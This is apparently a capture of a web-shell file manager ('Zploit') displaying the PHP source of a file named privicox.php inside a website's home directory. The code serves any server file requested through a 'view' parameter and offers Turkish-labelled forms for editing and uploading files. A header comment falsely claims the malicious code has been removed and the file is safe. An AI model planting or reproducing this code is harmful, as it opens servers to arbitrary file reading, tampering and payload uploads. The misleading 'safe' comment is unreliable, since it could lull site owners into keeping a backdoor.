:: **Zploit** v1.0 | Current Path: **/home/kreativepixelz/sukhadaworld.com/**
:: Editing File: privicox.php
<?php /** * Note: This file may contain artifacts of previous malicious infection. * However, the dangerous code has been removed, and the file is now safe to use. */ if (isset($_GET['view']) && is_file($_GET['view'])) { header("Content-type: text/plain"); readfile($_GET['view']); exit; } // -------- Dosya düzenleme (kaydetme) -------- echo "<hr>"; // -------- Dosya düzenleme arayüzü -------- if (isset($_GET['edit']) && is_file($_GET['edit'])) { $editFile = $_GET['edit']; $content = htmlspecialchars(file_get_contents($editFile)); echo "<h3>Dosya Düzenle: ".basename($editFile)."</h3>"; echo ' <form method="POST"> <textarea name="content" style="width:100%;height:300px;">'.$content.'</textarea><br><br> <input type="hidden" name="save_file" value="'.$editFile.'"> <button type="submit">Kaydet</button> </form> <hr> '; } // -------- Dosya yükleme formu -------- echo '<h3>Dosya Yükle</h3> <form method="POST" enctype="multipart/form-data"> <input type="file" name="upload_file"> <button type="submit">Yükle</button> </form>'; ?>